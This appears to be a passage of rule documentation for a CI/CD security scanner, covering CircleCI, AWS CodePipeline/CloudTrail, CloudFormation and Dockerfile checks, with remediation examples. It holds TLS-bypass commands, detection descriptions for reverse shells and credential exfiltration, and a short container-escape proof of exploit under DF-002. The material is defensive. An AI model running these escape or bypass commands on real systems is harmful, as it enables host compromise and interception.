How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege, the job gains access to keys it does not need, increasing the blast radius if the job is compromised.

Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
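
A minimal sketch of the two shapes (the fingerprint value is a placeholder):

```yaml
steps:
  # Flagged: loads every SSH key configured on the project
  - add_ssh_keys
  # Safe: loads only the listed key
  - add_ssh_keys:
      fingerprints:
        - "d2:17:5a:3e:9c:01:bb:42:8f:6e:aa:10:33:7d:5c:e9"
```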

Source: CC-019 in the CircleCI provider.

CC-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: CC-020 in the CircleCI provider.

CC-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.
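
A sketch of the install commands the check distinguishes (step list is illustrative):

```yaml
steps:
  - run: npm install   # flagged: resolves whatever satisfies package.json today
  - run: npm ci        # safe: installs exactly what package-lock.json records
  - run: pip install --require-hashes -r requirements.txt   # safe: hash-verified
```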

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-021 in the CircleCI provider.

CC-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: CC-022 in the CircleCI provider.

CC-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
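
One way to fix the certificate issue at the source, assuming a Debian/Ubuntu-based executor and an internal CA cert checked into the repo (path and filename are hypothetical):

```yaml
steps:
  - run:
      name: Trust the internal CA instead of disabling verification
      command: |
        sudo cp .circleci/internal-ca.crt /usr/local/share/ca-certificates/
        sudo update-ca-certificates
```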

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-023 in the CircleCI provider.

CC-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Signing (cosign sign) binds identity to bytes; attestation (cosign attest) binds a structured claim about how the artifact was built. SLSA verifiers check the latter so consumers can enforce builder/source/parameter policies.

Recommendation. Add a run: cosign attest command against a provenance.intoto.jsonl statement, or use the circleci/attestation orb. CC-006 covers signing; this rule covers the build-provenance step SLSA Build L3 requires.
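
A sketch of the attestation step; the IMAGE and DIGEST variables are assumed to be exported by earlier build steps:

```yaml
steps:
  - run:
      name: Attach SLSA provenance attestation
      command: |
        cosign attest --type slsaprovenance \
          --predicate provenance.intoto.jsonl \
          "${IMAGE}@${DIGEST}"
```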

Source: CC-024 in the CircleCI provider.

CC-025: Cache key derives from attacker-controllable input MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. CircleCI's restore_cache falls through each listed key until it finds a hit. When one of those keys is derived from CIRCLE_BRANCH, CIRCLE_TAG, or CIRCLE_PR_* (values an attacker can set by opening a PR), the attacker can plant a cache entry that a protected job later uses. Use a checksum-of-lockfile key or a static version label instead.

Recommendation. Derive save_cache and restore_cache keys from values the attacker can't control: the lockfile checksum ({{ checksum "package-lock.json" }}) and the build variant, not {{ .Branch }} or ${CIRCLE_PR_NUMBER}. A PR-scoped branch can seed a poisoned cache entry that a later main-branch run restores as trusted.
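
A sketch of the fall-through key list (key prefixes are illustrative):

```yaml
- restore_cache:
    keys:
      # Flagged: branch name is attacker-influenced via PR branches
      - deps-{{ .Branch }}
      # Safe: key changes only when the lockfile changes
      - deps-v1-{{ checksum "package-lock.json" }}
```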

Source: CC-025 in the CircleCI provider.

CC-026: Config contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Fires on concrete indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, credential-dump pipes, history-erasure).

Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any contexts/env vars the pipeline can reach, and audit recent CircleCI runs for outbound traffic to the matched hosts.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: CC-026 in the CircleCI provider.

CC-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements CC-002 (script injection from untrusted context). Fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd.

Source: CC-027 in the CircleCI provider.

CC-028: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements CC-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: CC-028 in the CircleCI provider.

CC-029: Machine executor image not pinned HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. CC-003 covers Docker images declared under docker: blocks. It does not reach the machine executor, where the image is set via machine.image. A rolling tag (current, edge, default) pulls a fresh image whenever CircleCI publishes one, reintroducing the same supply-chain risk Docker-image pinning is designed to eliminate.

Recommendation. Pin every machine.image to a dated release tag (ubuntu-2204:2024.05.1) rather than :current, :edge, :default, or a bare image name. CircleCI rotates the current / edge aliases on its own cadence, so builds re-run on an image the author never reviewed.
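
A minimal sketch of the pinned shape:

```yaml
jobs:
  build:
    machine:
      # Flagged: image: ubuntu-2204:current (CircleCI rotates the alias)
      image: ubuntu-2204:2024.05.1   # safe: dated release tag
```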

Source: CC-029 in the CircleCI provider.

CC-030: Workflow job uses context without branch filter or approval gate MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. CircleCI contexts are the recommended way to store shared secrets, but binding a context to a job is only half of least privilege; the other half is controlling when the binding activates. Unrestricted workflow entries with context: turn every branch push into a secret-read event.

Recommendation. Either add filters.branches.only: [<protected branches>] to restrict when the context-bound job runs, or require a type: approval job in requires: so a human gates the secret-carrying execution. Without either gate, every push to the project loads the context's secrets into an ephemeral runner where any compromised step can exfiltrate them.
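
A sketch combining both gates (workflow, job, and context names are hypothetical):

```yaml
workflows:
  release:
    jobs:
      - hold:
          type: approval            # human gate before secrets load
      - deploy:
          context: prod-secrets
          requires: [hold]
          filters:
            branches:
              only: [main]
```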

Source: CC-030 in the CircleCI provider.

CC-031: OIDC role assumption without branch filter or approval gate HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the cloud-side trust policy pins audience + subject; this rule verifies the CircleCI-side workflow can't drive the role assumption from any branch. Distinct from CC-030 (broad context binding, MEDIUM); CC-031 narrows to OIDC role assumption and is HIGH because role-bound credentials reach further than the project-scoped secrets in a context.

Recommendation. Restrict every workflow job that passes a cloud role_arn (or equivalent OIDC parameter) to a protected branch list, or require a type: approval predecessor. Without either gate, any push triggers a cloud-role assumption with the full blast radius of the IdP-side trust policy.

Source: CC-031 in the CircleCI provider.

CCM-000: CodeCommit API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CCM-000 in the AWS provider.

CCM-001: CodeCommit repository has no approval rule template attached HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Approval-rule templates are CodeCommit's analog of GitHub's branch-protection require-review. Without one associated, the repository accepts merges from any push-permitted principal, including the PR author themselves, without any second-pair-of-eyes gate.

Recommendation. Create a CodeCommit approval-rule template requiring at least one approval from a designated pool of reviewers and associate it with every repository. Without one, any PR author with push rights can self-approve and merge.

Source: CCM-001 in the AWS provider.

CCM-002: CodeCommit repository not encrypted with customer KMS CMK MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Same shape as CA-001 / ECR-005 / S3 default encryption: the AWS-owned default key keeps the key policy under AWS, removing your ability to scope or audit Decrypt operations. Source code in the repo deserves the same key-policy + CloudTrail story you'd apply to artifacts in S3.

Recommendation. Recreate the repository with a kmsKeyId argument pointing at a customer-managed KMS key. CodeCommit encryption is set at creation and cannot be changed afterwards.

Source: CCM-002 in the AWS provider.

CCM-003: CodeCommit trigger targets SNS/Lambda in a different account MEDIUM

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A repo trigger pointing at an SNS topic or Lambda in a different account fires under the receiving account's permissions on every push. Sometimes this is the intended shape (a centralized notifications account), but a cross-account fan-out from a compromised repo can drive actions in the receiving account that the source-account owner can't directly observe.

Recommendation. Move trigger targets into the same account as the repository or explicitly document the cross-account relationship. Cross-account triggers extend the blast radius of a repository compromise to whatever the target ARN can do.

Source: CCM-003 in the AWS provider.

CD-000: CodeDeploy API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CD-000 in the AWS provider.

CD-001: Automatic rollback on failure not enabled MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. Rollback is opt-in, not opt-out: by default, deployments fail open, not fail back.

Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
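
A CloudFormation sketch of the rollback setting (resource name is illustrative):

```yaml
DeploymentGroup:
  Type: AWS::CodeDeploy::DeploymentGroup
  Properties:
    AutoRollbackConfiguration:
      Enabled: true
      Events:
        - DEPLOYMENT_FAILURE
```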

Source: CD-001 in the AWS provider.

CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There is no gradient to halt on: if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.

Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.

Source: CD-002 in the AWS provider.

CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.

Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
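
A CloudFormation sketch pairing the alarms with alarm-triggered rollback (alarm names are hypothetical):

```yaml
DeploymentGroup:
  Type: AWS::CodeDeploy::DeploymentGroup
  Properties:
    AlarmConfiguration:
      Enabled: true
      Alarms:
        - Name: app-5xx-rate
        - Name: app-p99-latency
    AutoRollbackConfiguration:
      Enabled: true
      Events:
        - DEPLOYMENT_STOP_ON_ALARM
```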

Source: CD-003 in the AWS provider.

CF-001: Inline credential parameter on a CloudFormation resource HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See CloudFormation provider documentation for the rule's detection mechanism.

Recommendation. See CloudFormation provider documentation for the recommended remediation.

Source: CF-001 in the CloudFormation provider.

CF-002: CloudFormation parameter declares a default secret value HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See CloudFormation provider documentation for the rule's detection mechanism.

Recommendation. See CloudFormation provider documentation for the recommended remediation.

Source: CF-002 in the CloudFormation provider.

CF-003: CloudFormation resource opens a 0.0.0.0/0 ingress HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. See CloudFormation provider documentation for the rule's detection mechanism.

Recommendation. See CloudFormation provider documentation for the recommended remediation.

Source: CF-003 in the CloudFormation provider.

CP-000: CodePipeline API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CP-000 in the AWS provider.

CP-001: No approval action before deploy stages HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point; combine with CP-005 for production-tagged stages specifically.

Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
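
A CloudFormation stage-list fragment showing the approval stage placed before Deploy (stage and action names are hypothetical):

```yaml
- Name: Approve
  Actions:
    - Name: ProdGate
      ActionTypeId:
        Category: Approval
        Owner: AWS
        Provider: Manual
        Version: "1"
```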

Source: CP-001 in the AWS provider.

CP-002: Artifact store not encrypted with customer-managed KMS key MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The pipeline's S3 artifact store holds intermediate build outputs handed between stages. Default SSE-S3 (AES256) encrypts at rest but uses an AWS-owned key whose policy you can't scope. A customer-managed CMK gives the same key-policy + CloudTrail Decrypt-event audit story you'd apply to Lambda code, Secrets Manager, or any other build output.

Recommendation. Configure a customer-managed AWS KMS key as the encryptionKey for each artifact store. This enables key rotation, fine-grained access policies, and CloudTrail auditing of decrypt operations.
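
A CloudFormation sketch of the artifact store with a CMK; ArtifactBucket and ArtifactKey are assumed to be defined elsewhere in the template:

```yaml
ArtifactStore:
  Type: S3
  Location: !Ref ArtifactBucket
  EncryptionKey:
    Id: !GetAtt ArtifactKey.Arn   # customer-managed KMS key
    Type: KMS
```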

Source: CP-002 in the AWS provider.

CP-003: Source stage using polling instead of event-driven trigger LOW

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less useful CloudTrail story than event-driven triggers: you see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.

Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.

Known false positives.

  • PollForSourceChanges=true is the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.

Source: CP-003 in the AWS provider.

CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.

Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.

Source: CP-004 in the AWS provider.

CP-005: Production Deploy stage has no preceding ManualApproval MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. The complement to CP-001: this rule fires only on stages whose name contains prod / production / live. Even teams that intentionally skip approvals for dev / staging deploys usually want a human in the loop for a production-tagged target.

Recommendation. Add a Manual approval action immediately before any stage whose name contains prod / production. CP-001 covers the generic case; this rule specifically looks at production-tagged stages where the blast radius of an unreviewed deploy is largest.

Source: CP-005 in the AWS provider.

CP-007: CodePipeline v2 PR trigger accepts all branches HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. V2 pipelines added native PR triggers; without a branches.includes filter, any PR, including fork PRs from outside the org, fires the pipeline. The build stage runs with whatever IAM authority the pipeline's role carries, which is the full attack surface a fork-PR compromise can reach.

Recommendation. On V2 pipelines, add an includes filter under the trigger's branches block (and optionally pullRequest.events) so only PRs targeting specific branches run. Without a filter, any fork-PR can execute the pipeline's build and deploy stages.
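
One plausible CloudFormation shape for the V2 trigger filter (source action name and branch list are hypothetical):

```yaml
Triggers:
  - ProviderType: CodeStarSourceConnection
    GitConfiguration:
      SourceActionName: Source
      PullRequest:
        - Events: [OPEN, UPDATED]
          Branches:
            Includes: [main, "release/*"]
```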

Source: CP-007 in the AWS provider.

CT-000: CloudTrail API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CT-000 in the AWS provider.

CT-001: No active CloudTrail trail in region HIGH

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. CloudTrail is the only AWS-native source of record for management-plane API calls. A region with no active trail blinds incident responders: a pipeline compromise is invisible once the in-memory CloudWatch buffer rolls over.

Recommendation. Create a CloudTrail trail that logs management events in this region and start logging. Without a trail, CodeBuild/CodePipeline/IAM API activity, including credential changes during a compromise, has no durable audit record.

Source: CT-001 in the AWS provider.

CT-002: CloudTrail log-file validation disabled MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. CloudTrail logs are S3 objects. Without log-file validation, an attacker with s3:PutObject on the trail bucket can edit log files to remove evidence of their activity, and there's no digest to compare against. With validation on, every hour of logs is summarized in a signed digest file under CloudTrail-Digest/.

Recommendation. Set LogFileValidationEnabled=true on every CloudTrail trail. Log validation produces a signed digest file alongside each log object so tampering by an attacker who also has S3 write access can be detected after the fact.
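
A CloudFormation sketch of a trail with validation enabled; TrailBucket is assumed to exist elsewhere in the template (the multi-region flag also addresses CT-003):

```yaml
Trail:
  Type: AWS::CloudTrail::Trail
  Properties:
    IsLogging: true
    EnableLogFileValidation: true
    IsMultiRegionTrail: true
    S3BucketName: !Ref TrailBucket
```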

Source: CT-002 in the AWS provider.

CT-003: CloudTrail trail is not multi-region MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. An attacker who knows your CloudTrail trail is regional deliberately operates from a different region. Multi-region trails capture management events from every region into a single trail, closing the gap without you having to enumerate which regions you actually use.

Recommendation. Convert the trail to a multi-region trail. A single-region trail misses activity in every other region; an attacker aware of the scope can drive reconnaissance or persistence from an unlogged region.

Source: CT-003 in the AWS provider.

CW-001: No CloudWatch alarm on CodeBuild FailedBuilds metric LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Failure-rate signals are how on-call learns about an unfamiliar build crashing in a loop, an attacker probing the build environment, or a CI quota being exhausted. CloudWatch captures the FailedBuilds metric automatically; the alarm is the missing fan-out.

Recommendation. Create a CloudWatch alarm on the AWS/CodeBuild namespace FailedBuilds metric (aggregated or per-project). Without one, repeated build failures during a compromise, or a runaway fork-PR build, won't reach on-call.
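
A CloudFormation sketch of the alarm (threshold, period, and the OnCallTopic SNS reference are hypothetical):

```yaml
FailedBuildsAlarm:
  Type: AWS::CloudWatch::Alarm
  Properties:
    Namespace: AWS/CodeBuild
    MetricName: FailedBuilds
    Statistic: Sum
    Period: 300
    EvaluationPeriods: 1
    Threshold: 1
    ComparisonOperator: GreaterThanOrEqualToThreshold
    AlarmActions:
      - !Ref OnCallTopic
```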

Source: CW-001 in the AWS provider.

CWL-000: CloudWatch Logs API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CWL-000 in the AWS provider.

CWL-001: CodeBuild log group has no retention policy LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. CloudWatch Logs created by CodeBuild default to Never Expire retention. Build logs frequently echo secrets accidentally (a set -x script, an env dump in an error trace), so unbounded retention extends the exposure window for every secret a build has ever leaked. A short-but-finite retention also caps cost.

Recommendation. Set a retention policy on every /aws/codebuild/* log group. The default is 'Never Expire', which both racks up storage cost and keeps logs indefinitely past any compliance window.
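
A CloudFormation sketch of a bounded-retention log group (project name and retention window are illustrative):

```yaml
BuildLogs:
  Type: AWS::Logs::LogGroup
  Properties:
    LogGroupName: /aws/codebuild/my-project
    RetentionInDays: 90
```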

Source: CWL-001 in the AWS provider.

CWL-002: CodeBuild log group not KMS-encrypted MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. CloudWatch Logs default encryption is service-managed: fine for confidentiality, but with no audit trail or key-policy scoping. Build logs are a frequent secret-leak vector (CWL-001's rationale extended), so the same key-policy + Decrypt-event story you'd apply to S3 / Lambda / Secrets Manager is warranted here too.

Recommendation. Associate a customer-managed KMS key with every /aws/codebuild/* log group via associate-kms-key. Logs often contain secret material accidentally echoed by builds; encrypting them with a CMK means the key policy controls who can read the logs, not just S3/CloudWatch IAM.

Source: CWL-002 in the AWS provider.

DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too; only an explicit @sha256: survives, since the tag is mutable on the registry side.

Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
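
A minimal sketch of the two forms (the digest shown is illustrative, not the real digest for this tag):

```dockerfile
# Flagged: the tag can be re-pointed on the registry side at any time
FROM python:3.12.1-slim

# Safe: the digest pins the exact image bytes
FROM python:3.12.1-slim@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
```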

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • Docker Hub typosquatting / namespace-takeover incidents (2017 onward): Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (alpine vs alphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today.
  • Codecov codecov/codecov-action tag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's @v3 tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.

Source: DF-001 in the Dockerfile provider.

DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.

Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation: a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
  • CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.

Proof of exploit.

Vulnerable: image runs as root by default (no USER set).

```dockerfile
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3
COPY app.py /app/
CMD ["python3", "/app/app.py"]
```

Attack: when the container is breached (RCE in the app, a kernel CVE, a misconfigured mount), the attacker runs as UID 0. From there:

```shell
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt
# the host's runC binary; every container on the node is
# affected, and the next launch executes attacker code on
# the host:
echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe

# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
```

A non-root UID makes both paths fail at the first syscall.

Safe: drop to a dedicated unprivileged user.

```dockerfile
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3 \
 && useradd --uid 1001 --create-home app
COPY --chown=app:app app.py /app/
USER 1001
CMD ["python3", "/app/app.py"]
```

Source: DF-002 in the Dockerfile provider.

DF-003: ADD pulls remote URL without integrity verification HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.

Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
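
A sketch of the builder-stage pattern; the URL and the checksum placeholder are hypothetical, and curl is installed explicitly since slim bases omit it:

```dockerfile
# Builder stage downloads and verifies once
FROM debian:12-slim AS fetch
RUN apt-get update && apt-get install -y curl ca-certificates \
 && curl -fsSLo /tmp/tool.tgz https://example.com/tool.tgz \
 && echo "<known-sha256>  /tmp/tool.tgz" | sha256sum -c -

# Runtime stage copies the already-verified artifact
FROM debian:12-slim
COPY --from=fetch /tmp/tool.tgz /opt/tool.tgz
```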

Source: DF-003 in the Dockerfile provider.

DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).

Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.

Source: DF-004 in the Dockerfile provider.

DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.

Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.

Source: DF-005 in the Dockerfile provider.

DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

